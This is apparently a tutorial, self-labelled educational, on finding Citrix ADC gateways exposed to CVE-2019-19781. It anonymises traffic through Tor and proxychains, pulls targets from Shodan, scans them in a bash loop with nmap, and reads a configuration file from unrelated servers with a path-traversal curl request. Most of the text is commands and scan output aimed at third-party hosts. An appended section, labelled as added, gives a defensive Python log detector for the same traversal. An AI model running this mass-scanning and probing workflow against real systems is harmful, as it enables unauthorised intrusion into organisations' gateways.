NOTICE: Educational purposes only!
Hi, I want to show you how easy it is to find a vulnerable server on the internet. First we need a Tor client for anonymity ;) Before we begin, have a look at the following tools:
$ tor &
$ nyx -i 127.0.0.1:9052
Then we can test whether Tor is working correctly with proxychains:
$ proxychains curl ifconfig.me
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain ... 127.0.0.1:9050 ... ifconfig.me:80 ... OK
46.166.139.111
Run shodan to list all open services that look like a Citrix ADC Gateway:
$ proxychains -q shodan search --fields="ip_str,port" citrix netscaler > $HOME/citrix_list
Now we prepare a script that scans these services for CVE-2019-19781:
#!/bin/bash
# Each line of the list holds "<ip> <port>" as written by the shodan search above.
CITRIX_IP_LIST="$HOME/citrix_list"
while read -r IP PORT; do
    # skip blank or incomplete lines instead of running nmap with an empty port
    [ -n "$IP" ] && [ -n "$PORT" ] || continue
    proxychains -q nmap -p "$PORT" -sV --script CVE-2019-19781 "$IP"
done < "$CITRIX_IP_LIST"
After a short while we get some interesting results: there are still servers with this vulnerability present.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 15:16 CET
Nmap scan report for ---.---.---.---
Host is up (0.75s latency).
PORT STATE SERVICE VERSION
----/tcp open ssl/unknown
| CVE-2019-19781:
| VULNERABLE:
| Remote Code Execution vulnerability in Citrix Application Delivery Controller (ADC)
| State: VULNERABLE
| IDs: CVE:CVE-2019-19781
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Citrix Application Delivery Controller (ADC) CVE-2019-19781.
|
| Disclosure date: 2019-12-17
| References:
| https://support.citrix.com/article/CTX267027
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.99 seconds
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 15:18 CET
Nmap scan report for ---.---.---.---
Host is up (0.47s latency).
PORT STATE SERVICE VERSION
----/tcp open ssl/unknown
| CVE-2019-19781:
| VULNERABLE:
| Remote Code Execution vulnerability in Citrix Application Delivery Controller (ADC)
| State: VULNERABLE
| IDs: CVE:CVE-2019-19781
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Citrix Application Delivery Controller (ADC) CVE-2019-19781.
|
| Disclosure date: 2019-12-17
| References:
| https://support.citrix.com/article/CTX267027
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.11 seconds
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 15:21 CET
Nmap scan report for ---.---.---.---
Host is up (0.53s latency).
PORT STATE SERVICE VERSION
----/tcp open ssl/unknown
| CVE-2019-19781:
| VULNERABLE:
| Remote Code Execution vulnerability in Citrix Application Delivery Controller (ADC)
| State: VULNERABLE
| IDs: CVE:CVE-2019-19781
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Citrix Application Delivery Controller (ADC) CVE-2019-19781.
|
| Disclosure date: 2019-12-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781
|_ https://support.citrix.com/article/CTX267027
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.56 seconds
We can verify the vulnerability with curl:
$ proxychains -q curl -k --path-as-is https://<host>:<port>/vpn/../vpns/cfg/smb.conf && echo -e
[global]
encrypt passwords = yes
name resolve order = lmhosts wins host bcast
And that's it. :) We will not continue from this point, but an RCE exploit exists that gives the user full control.
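From the defender's side, the request used in the curl check above is also the thing to look for in your own gateway logs. The following is an added example, not code from the original post: a small Python detector that runs over constructed access-log lines and flags any request whose path, after percent-decoding, reaches the vpns directory through a ".." segment (the log format, IP addresses and the status-code verdict are assumptions).

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample lines in the common "combined" access-log format; not real traffic.
# Lines 2 and 3 carry the traversal seen in the curl check above (line 3 percent-encoded);
# lines 1 and 4 are benign requests that must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Jan/2020:15:30:01 +0100] "GET /vpn/index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Jan/2020:15:30:07 +0100] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 128 "-" "curl/7.68.0"
198.51.100.9 - - [24/Jan/2020:15:31:12 +0100] "GET /vpn/%2e%2e/vpns/cfg/smb.conf HTTP/1.1" 403 0 "-" "curl/7.68.0"
192.0.2.77 - - [24/Jan/2020:15:32:40 +0100] "GET /vpns/help.html HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_traversal_probe(raw_path: str) -> bool:
    """True when the request path shows the CVE-2019-19781 pattern: after
    percent-decoding it reaches a 'vpns' directory through a '..' segment."""
    path = raw_path.split("?", 1)[0]          # ignore any query string
    decoded = unquote(unquote(path)).lower()  # also catch double-encoded dots
    segments = decoded.split("/")
    return "vpns" in segments and ".." in segments


def find_probes(log_text: str) -> List[Dict[str, object]]:
    """Return one record per log line whose path matches the traversal pattern.
    Heuristic verdict (assumption): a 200 means the file was actually served,
    a 403 or 404 means the request was blocked or the path did not resolve."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal_probe(m["path"]):
            status = int(m["status"])
            hits.append({
                "src": m["src"],
                "ts": m["ts"],
                "path": m["path"],
                "status": status,
                "verdict": "served: likely unpatched" if status == 200 else "blocked/not served",
            })
    return hits


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["src"]} {hit["path"]} -> {hit["status"]} ({hit["verdict"]})')
```

A hit with status 200 is the one to act on first: it shows the appliance handed back a file from outside /vpn/, which is exactly what the curl check above demonstrates.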